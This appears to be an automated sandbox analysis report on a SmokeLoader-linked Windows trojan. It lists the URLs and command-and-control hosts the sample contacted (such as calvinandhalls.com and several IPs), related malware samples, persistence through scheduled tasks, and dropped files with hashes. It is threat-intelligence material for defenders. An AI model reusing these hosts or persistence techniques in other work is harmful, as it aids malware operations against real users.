https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.dr	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/q	explorer.exe, 00000001.00000000.1726201886.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000001.00000000.1728229982.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://calvinandhalls.com/earch.phpx	explorer.exe, 0000000D.00000002.2910898340.0000000003530000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://calvinandhalls.com/search.phpG	explorer.exe, 0000000D.00000002.2910898340.0000000003500000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A	explorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000001.00000000.1728229982.000000000C99F000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://wns.windows.com/L	explorer.exe, 00000001.00000000.1728229982.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://word.office.com	explorer.exe, 00000001.00000000.1728229982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.dr	false	0%, Virustotal, Browse	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.dr	false	URL Reputation: safe	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micr	explorer.exe, 00000001.00000000.1726201886.000000000982D000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.dr	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://aka.ms/Vh5j3k	explorer.exe, 00000001.00000000.1724600105.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://ac.ecosia.org/autocomplete?q=	explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.dr	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://api.msn.com/v1/news/Feed/Windows?&	explorer.exe, 00000001.00000000.1726201886.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://calvinandhalls.com/s	explorer.exe, 0000000D.00000002.2910898340.0000000003500000.00000004.00000020.00020000.00000000.sdmp	true	4%, Virustotal, Browse	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000001.00000000.1728229982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/	explorer.exe, 00000001.00000000.1726201886.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://outlook.com_	explorer.exe, 00000001.00000000.1728229982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	explorer.exe, 0000000D.00000003.2883898754.0000000003570000.00000004.00000020.00020000.00000000.sdmp, A024.tmp.13.dr	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com:443/en-us/feed	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://calvinandhalls.com:443/search.phpe	explorer.exe, 0000000D.00000002.2910898340.0000000003530000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of	explorer.exe, 00000001.00000000.1724600105.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
109.175.29.39	unknown	Bosnia and Herzegowina	9146	BIHNETBIHNETAutonomusSystemBA	true
58.151.148.90	nwgrus.ru	Korea Republic of	17858	POWERVIS-AS-KRLGPOWERCOMMKR	true
23.145.40.164	unknown	Reserved	22631	SURFAIRWIRELESS-IN-01US	true
23.145.40.162	calvinandhalls.com	Reserved	22631	SURFAIRWIRELESS-IN-01US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1524903
Start date and time:	2024-10-03 12:26:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 51s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	veEGy9FijY.exe renamed because original name is a hash value
Original Sample Name:	43da422957b397e2805362661ab3fd4a.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@63/14@7/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 140 Number of non-executed functions: 110
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ocsp.edge.digicert.com, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
06:27:22	API Interceptor	446399x Sleep call for process: explorer.exe modified
06:29:14	API Interceptor	14x Sleep call for process: WMIC.exe modified
11:27:23	Task Scheduler	Run new task: Firefox Default Browser Agent 4DA3A547DE244DD6 path: C:\Users\user\AppData\Roaming\haevsid
11:28:41	Task Scheduler	Run new task: Firefox Default Browser Agent 332E84517FF4935E path: C:\Users\user\AppData\Roaming\uievsid

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
109.175.29.39	Cjmw6m68OV.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	82HD7ZgYPA.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	HliN0ju7OT.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	yosoborno.com/tmp/
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	cajgtus.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
	xvJv1BpknZ.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	dbfhns.in/tmp/index.php
	file.exe	Get hash	malicious	Babuk, Djvu, PrivateLoader	Browse	cajgtus.com/lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54
	SecuriteInfo.com.Win32.RansomX-gen.4067.126.exe	Get hash	malicious	LummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, RedLine, SmokeLoader	Browse	trmpc.com/check/index.php
	7vMi37TpMO.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, Stealc	Browse	kamsmad.com/tmp/index.php
	kCJQaJf3Vs.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc	Browse	trmpc.com/check/index.php
58.151.148.90	oRKal761Qm.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
	n72I7qB2ss.exe	Get hash	malicious	SmokeLoader	Browse	mzxn.ru/tmp/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	cOm0MmeV34.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	gebeus.ru/tmp/index.php
	2gQsoHaGEm.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	dbfhns.in/tmp/index.php
	QJqJic3hex.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	dbfhns.in/tmp/index.php
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	cajgtus.com/files/1/build3.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
nwgrus.ru	v173TV3V11.exe	Get hash	malicious	SmokeLoader	Browse	190.219.117.240
	0k3ibTiMjy.exe	Get hash	malicious	SmokeLoader	Browse	189.61.54.32
	qg5Ddf4an9.exe	Get hash	malicious	SmokeLoader	Browse	181.52.122.51
	aZPm0tHPTX.exe	Get hash	malicious	SmokeLoader	Browse	187.131.253.169
	file.exe	Get hash	malicious	SmokeLoader	Browse	196.189.156.245
	k8JAXb3Lhs.exe	Get hash	malicious	SmokeLoader	Browse	78.89.199.216
	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse	187.228.112.175
	file.exe	Get hash	malicious	SmokeLoader	Browse	190.249.193.233
	file.exe	Get hash	malicious	SmokeLoader	Browse	210.182.29.70
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse	116.58.10.60
bg.microsoft.map.fastly.net	https://www.google.com.pe/url?q=Y7AzKRq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kI3xqbL8&sa=t&url=amp%2F%E2%80%8Bfc%C2%ADcid%E3%80%82io/www/%E2%80%8Brosan%C2%ADasidon%C2%ADiotri%C2%ADcologista%E2%80%8B.co%C2%ADm.%C2%ADbr/lo/lo//nJ5u8/Y21jX2FsbF9lbXBsb3llZXNfY29zdGFfcmljYUBjYXRhbGluYS5jb20=$	Get hash	malicious	HtmlDropper	Browse	199.232.214.172
	mnFHs2DuKg.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	PO906-645S790768.xlam.xlsx	Get hash	malicious	Unknown	Browse	199.232.214.172
	QT2Q1292300924.xla.xlsx	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://email.mg.pmctraining.com/c/eJwkkcuSojAUhp_muJOKJyHAgoXTyMw41lxaa9TepZNwkUvoEER8-i7o3Vf5_tS5qVhRobla6XgTYBCSaMP9VRFHAWWMaKZYqJifqSALMoEkyiiXWvBsVcZaCn-jwmCtA63XQaTFmoVhuNZSURVo5RPCgJEm97pGOivKtmxzT5pmVceFc10PdAuYAqbjOHq5MXmtPWm8oQJMB1sDTT-AJqz9rc_hMPwrt93h9id50qkA5FY6oMnlyEiJ-zFZQtMkT4C8F0ATB8h1byXQL5fmu5cteUx9uGswPcwxM1ipgSaAXKr5y5GfwtqEw05apk_lGF1-zE7M8tL9rZJs_1WwTvb_j-QKyO96lo9bW7n6w07X8_j289urze-_APkgliZnmsdJRNMB-pjWMhN9UZrWWd2qft7J8l6Zyiyw3-TiuJAUnZOFWBgwvZ4fncRoODRdcUW3VU39FJfX5xUj8v49Hd5e_Ns7EqDJysaiLnvTejchK2DkXval66VxtWjVcoZ7jJ8BAAD__0X-oIk	Get hash	malicious	Unknown	Browse	199.232.214.172
	DHL Receipt_AWB 9892671327.xls	Get hash	malicious	Unknown	Browse	199.232.214.172
	oRdgOQMxjr.exe	Get hash	malicious	RedLine	Browse	199.232.210.172
	PCUEAYj8Pj.exe	Get hash	malicious	AsyncRAT, MicroClip, PureLog Stealer, RedLine	Browse	199.232.214.172
	rD5Uox2mkB.exe	Get hash	malicious	AsyncRAT, MicroClip, PureLog Stealer, RedLine	Browse	199.232.210.172
	BANK STATEMENT REPORT.exe	Get hash	malicious	DarkCloud	Browse	199.232.210.172
calvinandhalls.com	v173TV3V11.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	0k3ibTiMjy.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	qg5Ddf4an9.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	aZPm0tHPTX.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
POWERVIS-AS-KRLGPOWERCOMMKR	yakov.m68k.elf	Get hash	malicious	Mirai	Browse	125.184.240.139
	novo.arm64.elf	Get hash	malicious	Mirai, Moobot	Browse	115.142.86.10
	novo.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	112.145.98.186
	novo.ppc440fp.elf	Get hash	malicious	Mirai, Moobot	Browse	180.224.39.213
	novo.x86.elf	Get hash	malicious	Mirai, Moobot	Browse	122.38.0.135
	SecuriteInfo.com.Linux.Siggen.9999.30976.5557.elf	Get hash	malicious	Mirai	Browse	122.153.117.174
	SecuriteInfo.com.Linux.Siggen.9999.1529.24643.elf	Get hash	malicious	Unknown	Browse	49.168.23.72
	SecuriteInfo.com.Linux.Siggen.9999.29695.14613.elf	Get hash	malicious	Unknown	Browse	49.168.23.53
	SecuriteInfo.com.Linux.Siggen.9999.32167.12194.elf	Get hash	malicious	Unknown	Browse	122.35.255.108
	SecuriteInfo.com.Linux.Siggen.9999.18891.22819.elf	Get hash	malicious	Unknown	Browse	125.189.57.254
BIHNETBIHNETAutonomusSystemBA	http://iss.fmpvs.gov.ba/Home/ChangeCulture?lang=hr&returnUrl=https://aaqkada0nzi2n2jhlthmzditndjinc1hz.hanskiin7.com/782340117681873687911955xbixgen-pgx-783419043035-ifxyeonkim-isxskyline-holt.comsf-1sf_rand()	Get hash	malicious	HTMLPhisher	Browse	109.175.10.156
	Cjmw6m68OV.exe	Get hash	malicious	SmokeLoader	Browse	109.175.29.39
	O9M84hUenb.elf	Get hash	malicious	Mirai, Okiru	Browse	92.36.229.158
	h8jGj6Qe78.exe	Get hash	malicious	CryptOne, SmokeLoader, Stealc, Vidar	Browse	92.36.226.66
	82HD7ZgYPA.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	109.175.29.39
	fEz10JQnRZ.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	92.36.226.66
	D9pL02CCa3.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	92.36.226.66
	P61q5FVlmo.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	92.36.226.66
	SUevAm2tWO.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	92.36.226.66
	HliN0ju7OT.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	92.36.226.66
SURFAIRWIRELESS-IN-01US	v173TV3V11.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	0k3ibTiMjy.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	qg5Ddf4an9.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	aZPm0tHPTX.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.162

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
72a589da586844d7f0818ce684948eea	v173TV3V11.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	0k3ibTiMjy.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	qg5Ddf4an9.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	aZPm0tHPTX.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	file.exe	Get hash	malicious	SmokeLoader	Browse	23.145.40.164
	SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe	Get hash	malicious	Metasploit	Browse	23.145.40.164
	SecuriteInfo.com.Win64.Evo-gen.19321.5552.exe	Get hash	malicious	Unknown	Browse	23.145.40.164
	SecuriteInfo.com.Win64.MalwareX-gen.15798.11018.exe	Get hash	malicious	Metasploit	Browse	23.145.40.164
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	23.145.40.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	23.145.40.162
	hVLguQ1OyJ.exe	Get hash	malicious	LummaC	Browse	23.145.40.162
	RD4ttmm3bO.exe	Get hash	malicious	LummaC	Browse	23.145.40.162
	v4yke52Xwu.exe	Get hash	malicious	LummaC	Browse	23.145.40.162
	pkUVF88MvI.exe	Get hash	malicious	LummaC	Browse	23.145.40.162
	QT2Q1292300924.xla.xlsx	Get hash	malicious	Unknown	Browse	23.145.40.162
	pl4VFaWQr8.exe	Get hash	malicious	LummaC	Browse	23.145.40.162
	DHL Receipt_AWB 9892671327.xls	Get hash	malicious	Unknown	Browse	23.145.40.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	23.145.40.162

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\BC8F.exe	v173TV3V11.exe	Get hash	malicious	SmokeLoader	Browse
	0k3ibTiMjy.exe	Get hash	malicious	SmokeLoader	Browse
	qg5Ddf4an9.exe	Get hash	malicious	SmokeLoader	Browse
	aZPm0tHPTX.exe	Get hash	malicious	SmokeLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\38E5.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	401920
Entropy (8bit):	6.896981606728238
Encrypted:	false
SSDEEP:	6144:HunX9+ryFMNYI7geKHHUxFt4oH9T4iNUTAxfPZO4OXkkjQy4asy4pTf:HuXdFMNYI7gdH03xT4UtYbvQy4Hy4N
MD5:	B39D75B20F14D8DFCB2325D7082CB2B9
SHA1:	CF55C38212461E02D7C8E8386CB1C9B2AC195891
SHA-256:	61FB5D3CEE24C193EC2EE9F73F6222D24A4222DAB4E777EEA02F77B1B261B7C0
SHA-512:	A9E9BC353CE6F65148FFE2E22FF6748405B74E202AA53395FB1D70F12DCF535051CD51F9D1EF6A3F38DA1320EA48C66DB4CA7B2279BE5E9D992643181DBEC8BE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_.<.>to.>to.>to.H.o.>to.H.o.>to.H.o.>to.F.o.>to.>uo.>to.H.o.>to.H.o.>to.H.o.>toRich.>to........PE..L.....Je.....................D......);.......0....@..........................p.......I..........................................x...................................8...................................@............................................text............................... ..`.data....u...0...b..................@....yatufu..............x..............@....rsrc................\|..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\98CC.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\98CC.tmp-shm

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\9C29.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\9E1F.tmp

Download File

Process:	C:\Windows\SysWOW64\explorer.exe
